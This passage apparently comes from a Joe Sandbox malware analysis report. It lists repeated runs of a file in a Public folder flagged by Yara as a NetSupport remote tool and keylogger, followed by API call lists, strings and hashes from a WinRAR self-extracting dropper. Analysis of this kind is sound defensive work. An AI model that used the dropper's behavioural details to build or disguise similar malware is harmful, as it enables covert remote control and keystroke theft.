Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:10:28
Start date:	25/11/2024
Path:	C:\Users\Public\Netstat\shv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Netstat\shv.exe"
Imagebase:	0xab0000
File size:	105'848 bytes
MD5 hash:	8D9709FF7D9C83BD376E01912C734F0A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:10:37
Start date:	25/11/2024
Path:	C:\Users\Public\Netstat\shv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Netstat\shv.exe"
Imagebase:	0xab0000
File size:	105'848 bytes
MD5 hash:	8D9709FF7D9C83BD376E01912C734F0A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:10:45
Start date:	25/11/2024
Path:	C:\Users\Public\Netstat\shv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Netstat\shv.exe"
Imagebase:	0xab0000
File size:	105'848 bytes
MD5 hash:	8D9709FF7D9C83BD376E01912C734F0A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.2431151804.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	26.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	25

Executed Functions

Function 00007FF70E7AB190 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E78255C: GetDlgItem.USER32 ref: 00007FF70E7825AC
Part of subcall function 00007FF70E78255C: SetWindowTextW.USER32 ref: 00007FF70E7825C8

EndDialog.USER32 ref: 00007FF70E7AB2D0
SetDlgItemTextW.USER32 ref: 00007FF70E7AB320
GetMessageW.USER32 ref: 00007FF70E7AB350
IsDialogMessageW.USER32 ref: 00007FF70E7AB369
TranslateMessage.USER32 ref: 00007FF70E7AB37B
DispatchMessageW.USER32 ref: 00007FF70E7AB389
EndDialog.USER32 ref: 00007FF70E7AB3D3
GetDlgItem.USER32 ref: 00007FF70E7AB410
SendMessageW.USER32 ref: 00007FF70E7AB431
SendMessageW.USER32 ref: 00007FF70E7AB449
SetFocus.USER32 ref: 00007FF70E7AB452
GetLastError.KERNEL32 ref: 00007FF70E7AB634
GetLastError.KERNEL32 ref: 00007FF70E7AB665
GetTickCount.KERNEL32 ref: 00007FF70E7AB68B
GetLastError.KERNEL32 ref: 00007FF70E7AB6F5
GetCommandLineW.KERNEL32 ref: 00007FF70E7AB841
CreateFileMappingW.KERNEL32 ref: 00007FF70E7AB900
MapViewOfFile.KERNEL32 ref: 00007FF70E7AB923
Sleep.KERNEL32 ref: 00007FF70E7AB9B6
UnmapViewOfFile.KERNEL32 ref: 00007FF70E7AB9DF
CloseHandle.KERNEL32 ref: 00007FF70E7AB9E8
SetDlgItemTextW.USER32 ref: 00007FF70E7ABCDE
DialogBoxParamW.USER32 ref: 00007FF70E7AC0D7
EndDialog.USER32 ref: 00007FF70E7AC0EF
EnableWindow.USER32 ref: 00007FF70E7AC2A6
SendMessageW.USER32 ref: 00007FF70E7AC2F8
ShellExecuteExW.SHELL32 ref: 00007FF70E7AB95B

Part of subcall function 00007FF70E79AAE0: LoadStringW.USER32 ref: 00007FF70E79AB67
Part of subcall function 00007FF70E79AAE0: LoadStringW.USER32 ref: 00007FF70E79AB80

SendMessageW.USER32 ref: 00007FF70E7ABEC3
SendDlgItemMessageW.USER32 ref: 00007FF70E7ABEEA
GetDlgItem.USER32 ref: 00007FF70E7ABEF8
SendMessageW.USER32 ref: 00007FF70E7ABF12
GetDlgItem.USER32 ref: 00007FF70E7ABF4F
SetDlgItemTextW.USER32 ref: 00007FF70E7ABFEC
SetDlgItemTextW.USER32 ref: 00007FF70E7AC004
SetDlgItemTextW.USER32 ref: 00007FF70E7AC321
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AC363
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AC369
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AC36F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AC375
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AC37B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AC381
SendDlgItemMessageW.USER32 ref: 00007FF70E7AC449
EndDialog.USER32 ref: 00007FF70E7AC463
GetDlgItem.USER32 ref: 00007FF70E7AC491
SetFocus.USER32 ref: 00007FF70E7AC49A
SendDlgItemMessageW.USER32 ref: 00007FF70E7AC53E
FindFirstFileW.KERNEL32 ref: 00007FF70E7AC562
FindClose.KERNEL32 ref: 00007FF70E7AC68A
SendDlgItemMessageW.USER32 ref: 00007FF70E7AC7AF

Part of subcall function 00007FF70E78129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70E781396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7ACAA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7ACAAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7ACAB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7ACABB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7ACAC1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7ACAC7

Strings

REPLACEFILEDLG, xrefs: 00007FF70E7AC3D3
__tmp_rar_sfx_access_check_, xrefs: 00007FF70E7AB6A9
%s %s, xrefs: 00007FF70E7AC6D9, 00007FF70E7AC946
winrarsfxmappingfile.tmp, xrefs: 00007FF70E7AB8E0
-el -s2 "-d%s" "-sp%s", xrefs: 00007FF70E7AB799
runas, xrefs: 00007FF70E7AB7C9
@, xrefs: 00007FF70E7AB7B6
p, xrefs: 00007FF70E7AB7AB
LICENSEDLG, xrefs: 00007FF70E7AC0C9
STARTDLG, xrefs: 00007FF70E7AB1CA

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
API String ID: 255727823-2702805183
Opcode ID: de4f4b709cb2e3ef0afd815f9e2b80d0aadc5616edddabf2b58e030f80ca3454
Instruction ID: bf21482a8f846e7c341d0cc1ac19734077316db18bfbc7b7277c6f0766181c69
Opcode Fuzzy Hash: de4f4b709cb2e3ef0afd815f9e2b80d0aadc5616edddabf2b58e030f80ca3454
Instruction Fuzzy Hash: 69D2C022A0968291EA25FB25EC502FAE361EFDD784FC46136DA4D477A6DF3CE544C320

Function 00007FF70E7ACE88 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963windowfileCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF70E7AD5F3
SendMessageW.USER32 ref: 00007FF70E7AD626
SendMessageW.USER32 ref: 00007FF70E7AD655
MoveFileW.KERNEL32 ref: 00007FF70E7ADB4B
MoveFileExW.KERNEL32 ref: 00007FF70E7ADB69
GetTempPathW.KERNEL32 ref: 00007FF70E7ADC49

Part of subcall function 00007FF70E781FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E781FFB

EndDialog.USER32 ref: 00007FF70E7ADFCA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70E7AEEE3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEEEF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF07
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF0D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF13
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF19
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF1F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF25
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF2B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF31
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF37
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF3D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF49
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF4F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF55
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AEF5B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70E7AEF67
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70E7AEF73

Strings

.lnk, xrefs: 00007FF70E7AE406, 00007FF70E7AE415
.tmp, xrefs: 00007FF70E7ADA85
HIDE, xrefs: 00007FF70E7AE9E5, 00007FF70E7AE9F4
<br>, xrefs: 00007FF70E7AD6DA, 00007FF70E7AD6E9
ProgramFilesDir, xrefs: 00007FF70E7AD4F0
Software\Microsoft\Windows\CurrentVersion, xrefs: 00007FF70E7AD501
MIN, xrefs: 00007FF70E7AEAE5, 00007FF70E7AEAF4
lnk, xrefs: 00007FF70E7AE3CA, 00007FF70E7AE3D9
@set:user, xrefs: 00007FF70E7ADD96, 00007FF70E7ADDA5
MAX, xrefs: 00007FF70E7AEA82, 00007FF70E7AEA91

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$DialogItemPathTemp
String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
API String ID: 3007431893-3916287355
Opcode ID: 43bce5ea5792e882a5fd2fa4796284cee02df7d41660bc68d822efcffb62a44e
Instruction ID: 62a632c5136d98e0712f2f449bfe5cb42834abcb72f55c1d18b9908274a64c63
Opcode Fuzzy Hash: 43bce5ea5792e882a5fd2fa4796284cee02df7d41660bc68d822efcffb62a44e
Instruction Fuzzy Hash: E213A032B04B8285EB10EF64DC402EC67A1EF98798FD42536DA5D17AE9DF38E585C360

Function 00007FF70E7B0754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF70E79DFD0: GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF70E79E018
Part of subcall function 00007FF70E79DFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF70E79E030
Part of subcall function 00007FF70E79DFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF70E79E05D

Part of subcall function 00007FF70E7962DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF70E7962F2
Part of subcall function 00007FF70E7962DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF70E79632C

Part of subcall function 00007FF70E7A946C: OleInitialize.OLE32 ref: 00007FF70E7A9486
Part of subcall function 00007FF70E7A946C: SHGetMalloc.SHELL32 ref: 00007FF70E7A94D4

GetCommandLineW.KERNEL32 ref: 00007FF70E7B096E
OpenFileMappingW.KERNEL32 ref: 00007FF70E7B0A07
MapViewOfFile.KERNEL32 ref: 00007FF70E7B0A30
UnmapViewOfFile.KERNEL32 ref: 00007FF70E7B0A46
MapViewOfFile.KERNEL32 ref: 00007FF70E7B0A63
UnmapViewOfFile.KERNEL32 ref: 00007FF70E7B0ACA
CloseHandle.KERNEL32 ref: 00007FF70E7B0AD3
SetEnvironmentVariableW.KERNELBASE ref: 00007FF70E7B0BAD
GetLocalTime.KERNEL32 ref: 00007FF70E7B0BB8
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF70E7B0C13
SetEnvironmentVariableW.KERNEL32 ref: 00007FF70E7B0C26
GetModuleHandleW.KERNEL32 ref: 00007FF70E7B0C2E
LoadIconW.USER32 ref: 00007FF70E7B0C4D
DialogBoxParamW.USER32 ref: 00007FF70E7B0CB6
Sleep.KERNEL32 ref: 00007FF70E7B0CE6
DeleteObject.GDI32 ref: 00007FF70E7B0D0D
DeleteObject.GDI32 ref: 00007FF70E7B0D1F
CloseHandle.KERNEL32 ref: 00007FF70E7B0D67
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7B0DD7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7B0DDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7B0DE3

Part of subcall function 00007FF70E7AFD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF70E7AFD43
Part of subcall function 00007FF70E7AFD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF70E7AFDBC

Strings

sfxstime, xrefs: 00007FF70E7B0C1F
winrarsfxmappingfile.tmp, xrefs: 00007FF70E7B09F9
sfxname, xrefs: 00007FF70E7B0B9B
STARTDLG, xrefs: 00007FF70E7B0CA5
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00007FF70E7B0C02

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 1048086575-3710569615
Opcode ID: f9f8d21d412cc80ec5460a59123b82ae5e39a9285cdf70869c7ac79b4d5a8083
Instruction ID: 80179914f786df03108a1cd75d47497ef385ab8beb42d7633cef01febf55b0ae
Opcode Fuzzy Hash: f9f8d21d412cc80ec5460a59123b82ae5e39a9285cdf70869c7ac79b4d5a8083
Instruction Fuzzy Hash: B4126161A18B8285FB10EB24EC453B9F365FF9C794F806235DA9D46AA5DF3CE140C720

Function 00007FF70E79A4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF70E79A504

Part of subcall function 00007FF70E7A0F68: WideCharToMultiByte.KERNEL32 ref: 00007FF70E7A0F99

SetDlgItemTextW.USER32 ref: 00007FF70E79A573
GetWindowRect.USER32 ref: 00007FF70E79A5AD
GetClientRect.USER32 ref: 00007FF70E79A5BB
GetWindowLongPtrW.USER32 ref: 00007FF70E79A66C
GetWindowRect.USER32 ref: 00007FF70E79A6B2
SetWindowTextW.USER32 ref: 00007FF70E79A6EC
GetSystemMetrics.USER32 ref: 00007FF70E79A6F7
GetWindow.USER32 ref: 00007FF70E79A708
GetWindowRect.USER32 ref: 00007FF70E79A746
GetWindow.USER32 ref: 00007FF70E79A808

Strings

$%s:, xrefs: 00007FF70E79A4EF
CAPTION, xrefs: 00007FF70E79A6CF

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
String ID: $%s:$CAPTION
API String ID: 2100155373-404845831
Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction ID: 4820514864d8568005bcf223a643f460d543b6fdc357f626d762be42c372c350
Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction Fuzzy Hash: 7E91B532B1864286E714AF39E80166AB7A1FF8C784F946535EE8D57B58DF3CE805CB10

Function 00007FF70E7A8624 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32 ref: 00007FF70E7A863D
SizeofResource.KERNEL32 ref: 00007FF70E7A8659
LoadResource.KERNEL32 ref: 00007FF70E7A8673
LockResource.KERNEL32 ref: 00007FF70E7A8685
GlobalAlloc.KERNELBASE ref: 00007FF70E7A86A6
GlobalLock.KERNEL32 ref: 00007FF70E7A86BB
CreateStreamOnHGlobal.COMBASE ref: 00007FF70E7A86E8
GdipAlloc.GDIPLUS ref: 00007FF70E7A86FE
GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF70E7A8769
GlobalUnlock.KERNEL32 ref: 00007FF70E7A878C
GlobalFree.KERNEL32 ref: 00007FF70E7A8795

Strings

PNG, xrefs: 00007FF70E7A862F

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
Instruction ID: 20cba0128381a32c5c42cea30f1a32237d3afd893f6e2dc5abf6e83ec0eff205
Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
Instruction Fuzzy Hash: 10412125A19B4681FF08AB56DC48379E3A4BF8CB94F885435DE0D47364EF7CE4898721

Function 00007FF70E78F930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E791239
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79123F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E791245
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79124B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E791251
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E791257
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79125D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E791263

Strings

__tmp_reference_source_, xrefs: 00007FF70E78FCCF, 00007FF70E78FCDE

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: __tmp_reference_source_
API String ID: 3668304517-685763994
Opcode ID: b355387ad8ce45ffac16443b60546fd725022fc17da0b809259fefa86d093003
Instruction ID: c74e2f072259cb1c11ef18ee1cf1157fa5731501b92980a991a9ce38dc0dbe5a
Opcode Fuzzy Hash: b355387ad8ce45ffac16443b60546fd725022fc17da0b809259fefa86d093003
Instruction Fuzzy Hash: 0CE2B562A196C292EA64EB35E9403FEE761FF99740F806132DB9D036A5CF3CE455C720

Function 00007FF70E784840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78511E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E785124
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78512A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E785E16
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E785E1C

Strings

CMT, xrefs: 00007FF70E7859B2

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: CMT
API String ID: 3668304517-2756464174
Opcode ID: 8d25fd63a65332c14761dec60f90f7e536d3e8df42b0a807d38d0572dc703df0
